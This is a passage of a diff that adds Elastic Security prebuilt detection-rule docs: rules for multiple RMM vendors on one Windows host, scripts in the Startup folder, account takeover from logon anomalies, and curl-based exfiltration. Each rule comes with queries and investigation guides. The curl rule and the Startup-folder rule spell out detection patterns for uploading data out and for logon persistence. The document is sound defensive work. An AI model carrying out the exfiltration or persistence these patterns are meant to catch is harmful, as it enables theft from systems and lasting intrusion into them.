Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc new file mode 100644 index 0000000000..a832d6ece5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host.asciidoc @@ -0,0 +1,226 @@ +[[prebuilt-rule-8-19-18-multiple-remote-management-tool-vendors-on-same-host]] +=== Multiple Remote Management Tool Vendors on Same Host + +Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/ +* https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-025a + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: CrowdStrike +* Data Source: Windows Security Event Logs +* Data Source: Elastic Endgame +* Data Source: Winlogbeat + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Multiple Remote Management Tool Vendors on Same Host* + + +This rule aggregates process start events by `host.id`, host name, and a nine-minute time bucket. Data can come from +Elastic Defend, Sysmon, Winlogbeat, Windows Security / forwarded events, Microsoft Defender for Endpoint, SentinelOne, +CrowdStrike FDR, or Elastic Endgame—where ECS process fields are populated. Each known RMM-related process name maps +to one **vendor** label (e.g. TeamViewer, AnyDesk, ScreenConnect). If **two or more different vendor labels** appear in +the same bucket, the rule signals. + + +*Possible investigation steps* + + +- Open **Esql.vendors_seen** and **Esql.processes_name_values** on the alert to see which tools fired in the window. +- Confirm whether the host is an MSP-managed jump box, helpdesk workstation, or lab where multiple RMM stacks are expected. +- For servers or standard user endpoints, treat as higher risk: review install source, code signatures, and recent logons. +- Correlate with other alerts (ingress tool transfer, suspicious scripting, new persistence) on the same `host.id`. +- Check asset inventory and change tickets for approved RMM software. + + +*False positive analysis* + + +- **MSP / IT tooling**: A technician machine with two approved agents (e.g. RMM + remote support) may match. Tune with + host or organizational unit exceptions, or raise the vendor threshold if your environment standardizes on a known pair. +- **Vendor rebrands or bundles**: Rare overlaps during migrations can briefly show two vendors; validate timeline and packages. + + +*Response and remediation* + + +- If unauthorized or unexplained: isolate the host, inventory installed remote-access software, remove unapproved tools, + and reset credentials that may have been exposed. Enforce a single approved RMM stack per asset class where possible. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.process-*, endgame-*, logs-crowdstrike.fdr*, logs-m365_defender.event-*, logs-sentinel_one_cloud_funnel.*, logs-system.security*, logs-windows.sysmon_operational-*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where (host.os.type == "windows" or host.os.family == "windows") + and event.category == "process" + and event.type == "start" + and process.name is not null +| eval Esql.rmm_vendor = case( + process.name == "AeroAdmin.exe", "AeroAdmin", + process.name == "AnyDesk.exe", "AnyDesk", + process.name == "AteraAgent.exe", "Atera", + process.name == "AweSun.exe", "AweSun", + process.name like "aweray_remote*.exe", "AweSun", + process.name == "apc_Admin.exe", "APC", + process.name == "apc_host.exe", "APC", + process.name == "BASupSrvc.exe", "BeyondTrust", + process.name == "bomgar-scc.exe", "BeyondTrust", + process.name == "Remote Support.exe", "BeyondTrust", + process.name == "B4-Service.exe", "BeyondTrust", + process.name == "CagService.exe", "BarracudaRMM", + process.name == "domotzagent.exe", "Domotz", + process.name == "domotz-windows-x64-10.exe", "Domotz", + process.name == "dwagsvc.exe", "DWService", + process.name == "DWRCC.exe", "DWService", + process.name like "fleetdeck_commander*.exe", "FleetDeck", + process.name == "getscreen.exe", "GetScreen", + process.name == "g2aservice.exe", "GoTo", + process.name == "GoToAssistService.exe", "GoTo", + process.name == "gotohttp.exe", "GoTo", + process.name == "GoToResolveProcessChecker.exe", "GoTo", + process.name == "GoToResolveUnattended.exe", "GoTo", + process.name == "ImperoClientSVC.exe", "Impero", + process.name == "ImperoServerSVC.exe", "Impero", + process.name == "ISLLight.exe", "ISLOnline", + process.name == "ISLLightClient.exe", "ISLOnline", + process.name == "jumpcloud-agent.exe", "JumpCloud", + process.name == "level.exe", "Level", + process.name == "LvAgent.exe", "Level", + process.name == "LMIIgnition.exe", "LogMeIn", + process.name == "LogMeIn.exe", "LogMeIn", + process.name == "ManageEngine_Remote_Access_Plus.exe", "ManageEngine", + process.name == "MeshAgent.exe", "MeshCentral", + process.name == "meshagent.exe", "MeshCentral", + process.name == "Mikogo-Service.exe", "Mikogo", + process.name == "NinjaRMMAgent.exe", "NinjaOne", + process.name == "NinjaRMMAgenPatcher.exe", "NinjaOne", + process.name == "ninjarmm-cli.exe", "NinjaOne", + process.name == "parsec.exe", "Parsec", + process.name == "PService.exe", "Pulseway", + process.name == "r_server.exe", "Radmin", + process.name == "radmin.exe", "Radmin", + process.name == "radmin3.exe", "Radmin", + process.name == "rserver3.exe", "Radmin", + process.name == "vncserver.exe", "RealVNC", + process.name == "vncviewer.exe", "RealVNC", + process.name == "winvnc.exe", "RealVNC", + process.name == "ROMServer.exe", "RealVNC", + process.name == "ROMViewer.exe", "RealVNC", + process.name == "RemotePC.exe", "RemotePC", + process.name == "RemotePCDesktop.exe", "RemotePC", + process.name == "RemotePCService.exe", "RemotePC", + process.name == "RemoteDesktopManager.exe", "Devolutions", + process.name == "RCClient.exe", "RPCSuite", + process.name == "RCService.exe", "RPCSuite", + process.name == "RPCSuite.exe", "RPCSuite", + process.name == "rustdesk.exe", "RustDesk", + process.name == "rutserv.exe", "RemoteUtilities", + process.name == "rutview.exe", "RemoteUtilities", + process.name == "saazapsc.exe", "Kaseya", + process.name like "ScreenConnect*.exe", "ScreenConnect", + process.name == "ScreenConnect.ClientService.exe", "ScreenConnect", + process.name == "Splashtop-streamer.exe", "Splashtop", + process.name == "strwinclt.exe", "Splashtop", + process.name == "SRService.exe", "Splashtop", + process.name == "smpcview.exe", "Splashtop", + process.name == "spclink.exe", "Splashtop", + process.name == "rfusclient.exe", "Splashtop", + process.name == "Supremo.exe", "Supremo", + process.name == "SupremoService.exe", "Supremo", + process.name == "Syncro.Overmind.Service.exe", "Splashtop", + process.name == "SyncroLive.Agent.Runner.exe", "Splashtop", + process.name == "Syncro.Installer.exe", "Splashtop", + process.name == "tacticalrmm.exe", "TacticalRMM", + process.name == "tailscale.exe", "Tailscale", + process.name == "tailscaled.exe", "Tailscale", + process.name == "teamviewer.exe", "TeamViewer", + process.name == "ticlientcore.exe", "Tiflux", + process.name == "TiAgent.exe", "Tiflux", + process.name == "ToDesk_Service.exe", "ToDesk", + process.name == "twingate.exe", "Twingate", + process.name == "tvn.exe", "TightVNC", + process.name == "tvnserver.exe", "TightVNC", + process.name == "tvnviewer.exe", "TightVNC", + process.name == "winwvc.exe", "TightVNC", + process.name like "UltraVNC*.exe", "UltraVNC", + process.name like "UltraViewer*.exe", "UltraViewer", + process.name like "AA_v*.exe", "AnyAssist", + process.name == "Velociraptor.exe", "Velociraptor", + process.name == "ToolsIQ.exe", "ToolsIQ", + process.name == "session_win.exe", "ZohoAssist", + process.name == "Zaservice.exe", "ZohoAssist", + process.name == "ZohoURS.exe", "ZohoAssist", + "" + ) +| where Esql.rmm_vendor != "" and Esql.rmm_vendor is not NULL +| stats Esql.vendor_count = count_distinct(Esql.rmm_vendor), + Esql.vendors_seen = values(Esql.rmm_vendor), + Esql.processes_executable_values = values(process.executable), + Esql.first_seen = min(@timestamp), + Esql.last_seen = max(@timestamp) + by host.name, host.id +| where Esql.vendor_count >= 2 +| sort Esql.vendor_count desc +| keep host.id, host.name, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc new file mode 100644 index 0000000000..69f815431a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory.asciidoc @@ -0,0 +1,167 @@ +[[prebuilt-rule-8-19-18-persistent-scripts-in-the-startup-directory]] +=== Persistent Scripts in the Startup Directory + +Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: Microsoft Defender for Endpoint +* Data Source: SentinelOne + +*Version*: 316 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Performance* + + +This rule may have low to medium performance impact due to the generic nature of VBS and JS scripts being loaded by Windows script engines. + + +*Investigating Persistent Scripts in the Startup Directory* + + +The Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence. + +This rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + + +*Related rules* + + +- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff +- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + + /* Call attention to file extensions that may be used for malicious purposes */ + /* Optionally, Windows scripting engine processes targeting shortcut files */ + ( + file.extension : ("vbs", "vbe", "wsh", "wsf", "js", "jse", "sct", "hta", "ps1", "bat", "cmd") or + process.name : ("wscript.exe", "cscript.exe") + ) and not (startsWith(user.domain, "NT") or endsWith(user.domain, "NT")) + + /* Identify files created or changed in the startup folder */ + and file.path : ( + "?:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", + "?:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Sub-technique: +** Name: Shortcut Modification +** ID: T1547.009 +** Reference URL: https://attack.mitre.org/techniques/T1547/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc new file mode 100644 index 0000000000..c1ba963d93 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-18-potential-account-takeover-logon-from-new-source-ip]] +=== Potential Account Takeover - Logon from New Source IP + +Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 14m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1078/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Account Takeover - Logon from New Source IP* + + +An account that historically logs in many times from a single source IP (e.g. usual workstation or VPN) and then shows successful logons from exactly one other IP with a low count may indicate credential compromise and use from a new location (account takeover). + + +*Possible investigation steps* + + +- Confirm with the account owner whether they recently logged in from the new source IP or from a new device/location. +- Check the new source IP for reputation, geography, and whether it is expected (e.g. corporate VPN range vs unknown). +- Correlate with other alerts for the same user or source IP (e.g. logon failures, password changes, MFA changes). +- Review timeline: if the "new" IP logon is very recent compared to the high-count IP, treat as higher priority. + + +*False positive analysis* + + +- Legitimate use from a second device (e.g. new laptop, second office, VPN from travel) can produce exactly two IPs with one IP having few logons. Tune threshold (e.g. max_logon >= 100) or add exclusions for known VPN/remote ranges if needed. +- Service or shared accounts that are used from multiple jump hosts or scripts may show two IPs; consider excluding known service accounts. + + +*Response and remediation* + + +- If takeover is confirmed: force password reset, revoke sessions, and enable or enforce MFA. Disable or lock the account until the user verifies identity. +- Investigate how credentials may have been compromised (phishing, breach, endpoint) and address the vector. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| where event.category == "authentication" and event.action == "logged-in" and winlog.event_id == "4624" and + event.outcome == "success" and winlog.logon.type in ("Network", "RemoteInteractive") and + source.ip is not null and source.ip != "127.0.0.1" and not to_string(source.ip) like "*::*" and not user.name like "*$" +| stats logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, source.ip +| stats + Esql.max_logon = MAX(logon_count), + Esql.min_logon = MIN(logon_count), + Esql.unique_host_count = COUNT_DISTINCT(host_names), + Esql.host_name_values = VALUES(host_names), + Esql.source_ip_values = VALUES(source.ip), + Esql.count_distinct_source_ip = COUNT_DISTINCT(source.ip) by user.name, user.id + +// high count of logons is often associated with service account tied to a specific source.ip, if observed in use from a new source.ip it's suspicious +| where Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 5) and Esql.count_distinct_source_ip == 2 and Esql.unique_host_count >= 2 +| eval source.ip = MV_FIRST(Esql.source_ip_values), host.name = MV_FIRST(Esql.host_name_values) +| KEEP user.name, user.id, host.name, source.ip, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc new file mode 100644 index 0000000000..3cdb21e0d5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types.asciidoc @@ -0,0 +1,113 @@ +[[prebuilt-rule-8-19-18-potential-account-takeover-mixed-logon-types]] +=== Potential Account Takeover - Mixed Logon Types + +Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 14m + +*Searches indices from*: now-15m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1078/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Data Source: Windows Security Event Logs +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential Account Takeover - Mixed Logon Types* + + +A high-volume account (e.g. service account tied to a specific logon type such as Batch or Network) that also shows successful logons with a different logon type and low count may indicate credential compromise and use from a new context (account takeover or misuse). + + +*Possible investigation steps* + + +- Confirm with the account owner or service owner whether the additional logon type is expected (e.g. new automation, RDP for maintenance). +- Review which logon types appear in Esql.logon_type_values and which has the low count (likely the anomalous one). +- Correlate with other alerts for the same user (e.g. logon from new source IP, password changes, MFA changes). +- Check whether the account is a known service account; if so, verify if any new scripts or systems were authorized to use it. + + +*False positive analysis* + + +- Legitimate expansion of use (e.g. service account also used for occasional interactive logon for troubleshooting) can trigger this. Tune thresholds (e.g. max_logon >= 1000, min_logon <= 10) or add exclusions for known service accounts with documented multi-context use. +- New scheduled tasks or automation that use a different logon type may cause a short-lived spike in the "other" logon type; review over a longer window if needed. + + +*Response and remediation* + + +- If takeover or misuse is confirmed: force password reset, revoke sessions, rotate service account credentials, and restrict logon type or source where possible. +- Investigate how credentials may have been compromised and address the vector. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index +| WHERE event.category == "authentication" and event.action == "logged-in" and winlog.event_id == "4624" and + event.outcome == "success" and not user.id in ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + to_lower(user.name) != "administrator" +| STATS logon_count = COUNT(*), host_names = VALUES(host.name) by user.name, user.id, winlog.logon.type +| STATS + Esql.max_logon = MAX(logon_count), + Esql.min_logon = MIN(logon_count), + Esql.unique_host_count = COUNT_DISTINCT(host_names), + Esql.host_name_values = VALUES(host_names), + Esql.logon_type_values = VALUES(winlog.logon.type), + Esql.count_distinct_logon_types = COUNT_DISTINCT(winlog.logon.type) by user.name, user.id + +// high count of logons is often associated with service account tied to a specific service, if observed in use with a different logon type it's suspicious +| WHERE Esql.count_distinct_logon_types >= 2 and Esql.max_logon >= 1000 and (Esql.min_logon >= 1 and Esql.min_logon <= 10) and Esql.unique_host_count >= 2 +| EVAL winlog.logon.type = MV_FIRST(Esql.logon_type_values), host.name = MV_FIRST(Esql.host_name_values) +| KEEP user.name, user.id, host.name, winlog.logon.type, Esql.* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc new file mode 100644 index 0000000000..0854e3c15b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl.asciidoc @@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-18-potential-data-exfiltration-through-curl]] +=== Potential Data Exfiltration Through Curl + +Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-crowdstrike.fdr* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://everything.curl.dev/usingcurl/uploads +* https://cloud.google.com/blog/topics/threat-intelligence/disrupting-gridtide-global-espionage-campaign?hl=en + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Exfiltration +* Data Source: Elastic Defend +* Resources: Investigation Guide +* Data Source: Crowdstrike +* Data Source: SentinelOne + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Data Exfiltration Through Curl* + + +Curl is a command-line tool used for transferring data with URLs, commonly employed for legitimate data exchange tasks. However, adversaries can exploit curl to exfiltrate sensitive data by uploading compressed files to remote servers. The detection rule identifies suspicious curl usage by monitoring for specific command patterns and arguments indicative of data uploads, flagging abnormal activities for further investigation. + + +*Possible investigation steps* + + +- Review the process command line to confirm the presence of suspicious arguments such as "-F", "-T", "-d", or "--data*" and check for any compressed file extensions like .zip, .gz, or .tgz being uploaded to an external server. +- Investigate the parent process of the curl command to understand the context in which curl was executed, including the parent executable and its purpose. +- Examine network logs to identify the destination IP address or domain to which the data was being uploaded, and assess whether it is a known or suspicious entity. +- Check for any recent file creation or modification events on the host that match the compressed file types mentioned in the query, which could indicate data collection prior to exfiltration. +- Correlate this event with other security alerts or logs from the same host to identify any patterns of behavior that might suggest a broader compromise or data exfiltration attempt. + + +*False positive analysis* + + +- Legitimate data transfers using curl for system backups or data synchronization can trigger the rule. To manage this, identify and whitelist specific processes or scripts that are known to perform these tasks regularly. +- Automated system updates or software installations that use curl to download and upload data might be flagged. Exclude these processes by verifying their source and adding them to an exception list if they are from trusted vendors. +- Internal data transfers within a secure network that use curl for efficiency can be mistaken for exfiltration. Monitor the destination IP addresses and exclude those that are internal or known safe endpoints. +- Developers or system administrators using curl for testing or development purposes may inadvertently trigger the rule. Educate these users on the potential alerts and establish a process for them to notify security teams of their activities to prevent unnecessary investigations. +- Scheduled tasks or cron jobs that use curl for routine data uploads should be reviewed and, if deemed safe, added to an exception list to avoid repeated false positives. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further data exfiltration and contain the threat. +- Terminate any suspicious curl processes identified by the detection rule to stop ongoing data transfers. +- Conduct a forensic analysis of the affected system to identify any additional malicious activities or compromised data. +- Change credentials and access keys that may have been exposed or used during the incident to prevent unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further action. +- Review and update firewall and network security rules to block unauthorized outbound traffic, especially to suspicious or unknown external servers. +- Implement enhanced monitoring and logging for curl usage and similar data transfer tools to detect and respond to future exfiltration attempts promptly. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "ProcessRollup2", "start") and +process.name == "curl" and ?process.parent.executable != null and +( + process.args in ("-T", "--upload-file") or + ( + (process.args in ("-F", "-d", "--form") or process.args like "--data*") and process.command_line like "*@*" + ) +) and +( + process.command_line like ("*http:*", "*https:*", "*ftp:*", "*ftps:*") or + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}.*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Alternative Protocol +** ID: T1048 +** Reference URL: 